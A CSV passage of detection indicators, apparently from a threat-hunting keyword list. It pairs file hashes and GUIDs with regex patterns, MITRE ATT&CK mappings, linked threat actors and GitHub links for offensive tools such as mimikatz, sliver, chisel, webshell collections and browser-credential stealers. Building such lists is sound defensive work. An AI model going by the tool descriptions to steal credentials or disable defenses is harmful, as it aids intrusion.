"*a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142*",".{0,1000}a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","32171"
"*a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2*",".{0,1000}a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32172"
"*a071416b90984cabb06774bb2177d004798c40b52ced3e9604af9997b82838d7*",".{0,1000}a071416b90984cabb06774bb2177d004798c40b52ced3e9604af9997b82838d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32173"
"*a0767e6ca9109d8a0e82ac8abe1a1971e03de8d734905a09854244e9d316f73a*",".{0,1000}a0767e6ca9109d8a0e82ac8abe1a1971e03de8d734905a09854244e9d316f73a.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32174"
"*a076c96c9713804c8b2f26ffc09b931339be9f35227c749fb21fc9b574f97051*",".{0,1000}a076c96c9713804c8b2f26ffc09b931339be9f35227c749fb21fc9b574f97051.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32175"
"*a07dd62cf32175dc33bd37663dd3c89eef9413c805ad448e0e5a252b5cb5527f*",".{0,1000}a07dd62cf32175dc33bd37663dd3c89eef9413c805ad448e0e5a252b5cb5527f.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","32176"
"*a07f5f82857dd9e0b02b4bb90783e028ff42e80fe8286dd2c8e983db138c3820*",".{0,1000}a07f5f82857dd9e0b02b4bb90783e028ff42e80fe8286dd2c8e983db138c3820.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#filehash","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","32177"
"*a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196*",".{0,1000}a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32178"
"*a080c293df2577cc210e889abb0be13126606f159ff4b2c88323dc753f7b2c2c*",".{0,1000}a080c293df2577cc210e889abb0be13126606f159ff4b2c88323dc753f7b2c2c.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32179"
"*a085122b8ad43a0b5ab96a6e4f96563a6bd844b45c00b9ff7b16c20c31f83e0e*",".{0,1000}a085122b8ad43a0b5ab96a6e4f96563a6bd844b45c00b9ff7b16c20c31f83e0e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32180"
"*a08a45f16e52e6e3ec41d195cb1d6bd4ecfd748c47970bd522e9eae8b2575c0e*",".{0,1000}a08a45f16e52e6e3ec41d195cb1d6bd4ecfd748c47970bd522e9eae8b2575c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32181"
"*a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d*",".{0,1000}a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32182"
"*a0a87215fd80d837f4825deccf302cb0fe7184219580988194789ecc1d65fc1a*",".{0,1000}a0a87215fd80d837f4825deccf302cb0fe7184219580988194789ecc1d65fc1a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32185"
"*a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32*",".{0,1000}a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32186"
"*a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0*",".{0,1000}a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","#filehash","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","32187"
"*A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3*",".{0,1000}A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","32189"
"*a0b465738c8244eae2e5b1c2574e621b044405cf9c3a574e44737ff08f9ea442*",".{0,1000}a0b465738c8244eae2e5b1c2574e621b044405cf9c3a574e44737ff08f9ea442.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","32190"
"*a0b87b7223b946059d61f7c955981ad9715a243f4b4116dd2dcb4352f9a02460*",".{0,1000}a0b87b7223b946059d61f7c955981ad9715a243f4b4116dd2dcb4352f9a02460.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","32191"
"*a0bc5a42f2415d9efc221c2ffa9d2ef131351be75d4494f84fefff7bf5427323*",".{0,1000}a0bc5a42f2415d9efc221c2ffa9d2ef131351be75d4494f84fefff7bf5427323.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32192"
"*a0bf933c2db4c92515bd4bcbfd5e7e07baca998423bdc11056f5271e3b93aef5*",".{0,1000}a0bf933c2db4c92515bd4bcbfd5e7e07baca998423bdc11056f5271e3b93aef5.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","32193"
"*a0c0ea6786bf9ed2a243e6363409ba76b4f821e64d79e2587501050a46f3e326*",".{0,1000}a0c0ea6786bf9ed2a243e6363409ba76b4f821e64d79e2587501050a46f3e326.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","32194"
"*a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b*",".{0,1000}a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32195"
"*a0c82b68e731b303cbb379ca1bab45110c65edae85dd183bb66c55b0a7f3e9fe*",".{0,1000}a0c82b68e731b303cbb379ca1bab45110c65edae85dd183bb66c55b0a7f3e9fe.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","32197"
"*a0d8d1a6146edb9a3e05ed28f1069322c094145fbd27e1864f891d962db6be54*",".{0,1000}a0d8d1a6146edb9a3e05ed28f1069322c094145fbd27e1864f891d962db6be54.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32199"
"*a0dc0f46eb7ed3f8bd2fa9e1ff1b6e9beb1921bc63e7c72abba2d4a30bec7871*",".{0,1000}a0dc0f46eb7ed3f8bd2fa9e1ff1b6e9beb1921bc63e7c72abba2d4a30bec7871.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32200"
"*A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC*",".{0,1000}A0E096FB\-3AEF\-41B5\-A67B\-BD90D2FEBBFC.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32201"
"*a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23*",".{0,1000}a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#filehash","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","32202"
"*a0e6607e98251fd8dc2d2129d45c473611b9980ffdbff5738ebfb18c440a69fb*",".{0,1000}a0e6607e98251fd8dc2d2129d45c473611b9980ffdbff5738ebfb18c440a69fb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32203"
"*a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739*",".{0,1000}a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32204"
"*a0e70901c1b7a25d6bcba8c7dac024c7fdd9641f8a687ae39deb7217f4c09411*",".{0,1000}a0e70901c1b7a25d6bcba8c7dac024c7fdd9641f8a687ae39deb7217f4c09411.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32205"
"*A0E7B538-F719-47B8-8BE4-A82C933F5753*",".{0,1000}A0E7B538\-F719\-47B8\-8BE4\-A82C933F5753.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#GUIDproject","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","32206"
"*A0F044C5-D910-4720-B082-58824E372281*",".{0,1000}A0F044C5\-D910\-4720\-B082\-58824E372281.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#GUIDproject","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","32208"
"*a0f3b76ea770d4e850a7e3904efe22f53d348cf40767e279d873ffee5ae89a6e*",".{0,1000}a0f3b76ea770d4e850a7e3904efe22f53d348cf40767e279d873ffee5ae89a6e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32209"
"*a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2*",".{0,1000}a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32211"
"*a0fd47aca72b23be5ed3afcf1240130f12a8e8981ea7674ff1ee6e7d34935b3d*",".{0,1000}a0fd47aca72b23be5ed3afcf1240130f12a8e8981ea7674ff1ee6e7d34935b3d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32212"
"*a0rtega/metame*",".{0,1000}a0rtega\/metame.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","N/A","6","580","88","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z","32214"
"*a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd*",".{0,1000}a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","32215"
"*a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd*",".{0,1000}a10190903dfb52127ae37214a8c0124c68fc2f7fc91d0bae55eb9f556fa3c8dd.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","32216"
"*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*",".{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","#GUIDproject","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","32223"
"*a11f916dc20d775bd4961ae27388d2ac5a6613a45e58589040aacd8e70042a23*",".{0,1000}a11f916dc20d775bd4961ae27388d2ac5a6613a45e58589040aacd8e70042a23.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32224"
"*a1202bb8a90a635f6551b1733c4b777ee6abac7689dad8e7391e3ad01e3a370e*",".{0,1000}a1202bb8a90a635f6551b1733c4b777ee6abac7689dad8e7391e3ad01e3a370e.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","32225"
"*a121163840b57e70165172fe625a054fb1988468fb1a51aed45355463fb3cac4*",".{0,1000}a121163840b57e70165172fe625a054fb1988468fb1a51aed45355463fb3cac4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32226"
"*a12141ccddd231b9596e3ded58b95835338ff5f5fbc0b9470788e51fe9b4e651*",".{0,1000}a12141ccddd231b9596e3ded58b95835338ff5f5fbc0b9470788e51fe9b4e651.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32227"
"*a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb*",".{0,1000}a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32228"
"*a127dfa17e403f954441ae42d4bca8d2bdbc2e566e522a2ea75d88722540efae*",".{0,1000}a127dfa17e403f954441ae42d4bca8d2bdbc2e566e522a2ea75d88722540efae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32229"
"*a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7*",".{0,1000}a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32230"
"*a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f*",".{0,1000}a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32232"
